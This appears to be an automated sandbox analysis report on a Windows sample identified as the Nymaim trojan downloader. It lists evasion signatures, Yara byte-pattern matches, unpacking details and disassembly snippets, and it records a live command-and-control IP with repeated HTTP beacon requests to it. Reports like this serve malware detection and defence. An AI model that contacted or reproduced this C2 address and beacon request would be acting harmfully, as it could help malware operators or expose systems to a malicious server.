Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1565665
MD5:c54023b84d77e5ce72a48eda24bbc227
SHA1:21c893f54354a48114c3d36e938f69f7d7f32430
SHA256:e2cee0f3aa497ae6990b9ff45110eaf89a95b31e34383ef8c655bf1a12544d43
Tags:exeuser-Bitsight
Infos:

Detection

Nymaim
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5796 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C54023B84D77E5CE72A48EDA24BBC227)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NymaimNymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.4101686121.00000000047A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x8436:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.1656980225.0000000004A40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
        00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.3.file.exe.4a40000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
          0.2.file.exe.4950e67.1.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
            0.2.file.exe.400000.0.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              0.2.file.exe.400000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubPjAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 0.3.file.exe.4a40000.0.raw.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 31%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004035D0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004035D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04953837 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_04953837
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                Networking

                barindex
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Joe Sandbox ViewIP Address: 185.156.72.65 185.156.72.65
                Source: Joe Sandbox ViewASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401970
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: file.exe, 00000000.00000002.4100666631.0000000000C62000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4100666631.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4100666631.0000000000C67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                Source: file.exe, 00000000.00000002.4100666631.0000000000C67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubPj

                E-Banking Fraud

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 0.3.file.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.4950e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1656980225.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000000.00000002.4101686121.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004109400_2_00410940
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A3460_2_0041A346
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EBC70_2_0040EBC7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403D400_2_00403D40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415E590_2_00415E59
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B6D00_2_0040B6D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EE00_2_00402EE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404F700_2_00404F70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EF090_2_0040EF09
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041572E0_2_0041572E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006881320_2_00688132
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C72A10_2_006C72A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070230E0_2_0070230E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00480C4B0_2_00480C4B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F28560_2_005F2856
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DCE530_2_005DCE53
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DAE720_2_005DAE72
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004734030_2_00473403
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E4E3C0_2_005E4E3C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00552E310_2_00552E31
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CAA280_2_004CAA28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005CB6D50_2_005CB6D5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005624E10_2_005624E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E189C0_2_005E189C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047389F0_2_0047389F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054828B0_2_0054828B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A27020_2_004A2702
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E693F0_2_005E693F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F0D310_2_005F0D31
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050C9D40_2_0050C9D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EB99E0_2_005EB99E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DE3980_2_005DE398
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DFDBE0_2_005DFDBE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005ED5B70_2_005ED5B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E33A60_2_005E33A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_049551D70_2_049551D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495EE2E0_2_0495EE2E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04953FA70_2_04953FA7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_049659950_2_04965995
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_049551D70_2_049551D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495B9370_2_0495B937
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495F1700_2_0495F170
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04960BA70_2_04960BA7
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0495AA07 appears 34 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040A7A0 appears 35 times
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000000.00000002.4101686121.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: file.exeStatic PE information: Section: ZLIB complexity 0.9953100119426752
                Source: file.exeStatic PE information: Section: cippurft ZLIB complexity 0.9926368211269656
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A50
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_047A8464 CreateToolhelp32Snapshot,Module32First,0_2_047A8464
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401970
                Source: C:\Users\user\Desktop\file.exeCommand line argument: nosub0_2_004087E0
                Source: C:\Users\user\Desktop\file.exeCommand line argument: mixtwo0_2_004087E0
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 31%
                Source: file.exeString found in binary or memory: /add?substr=
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2029568 > 1048576
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: file.exeStatic PE information: Raw size of cippurft is bigger than: 0x100000 < 0x1ad400

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cippurft:EW;vcdmathy:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1fe036 should be: 0x1fd309
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: cippurft
                Source: file.exeStatic PE information: section name: vcdmathy
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A237 push ecx; ret 0_2_0040A24A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00421B7D push esi; ret 0_2_00421B86
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00706F6A push ebp; mov dword ptr [esp], 1CC82F81h0_2_007071B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007068FA push esi; ret 0_2_00706909
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007060FF push ebp; ret 0_2_0070610E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070B0D8 push es; ret 0_2_0070B0D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007068AC push ebp; ret 0_2_007068BB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007060AF push ebx; ret 0_2_007060BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00709961 push 56611FC7h; mov dword ptr [esp], esi0_2_007099EF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00709961 push 2D762CA2h; mov dword ptr [esp], edi0_2_00709A21
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00709961 push esi; mov dword ptr [esp], ecx0_2_00709A49
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00709961 push 485458E8h; mov dword ptr [esp], edi0_2_00709A79
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00709961 push 50F2A918h; mov dword ptr [esp], ebp0_2_00709A81
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00706153 push ebx; ret 0_2_00706162
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070B132 push es; retf 0_2_0070B150
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070693A push edx; ret 0_2_00706949
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007061F3 push ebx; ret 0_2_00706202
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007069FB push edi; ret 0_2_00706A0A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007081E5 push 79B24A64h; mov dword ptr [esp], esi0_2_0070821C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007081E5 push 06E45827h; mov dword ptr [esp], edi0_2_00708249
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007081E5 push 4718A8D7h; mov dword ptr [esp], ecx0_2_00708277
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007061C5 push edi; ret 0_2_007061D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007099C8 push 56611FC7h; mov dword ptr [esp], esi0_2_007099EF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007099C8 push esi; mov dword ptr [esp], ecx0_2_00709A49
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007099C8 push 485458E8h; mov dword ptr [esp], edi0_2_00709A79
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007099C8 push 50F2A918h; mov dword ptr [esp], ebp0_2_00709A81
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007079B0 push 81000000h; retn 0004h0_2_007079B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007069BB push edi; ret 0_2_007069CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007099AD push 56611FC7h; mov dword ptr [esp], esi0_2_007099EF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007099AD push 2D762CA2h; mov dword ptr [esp], edi0_2_00709A21
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007099AD push esi; mov dword ptr [esp], ecx0_2_00709A49
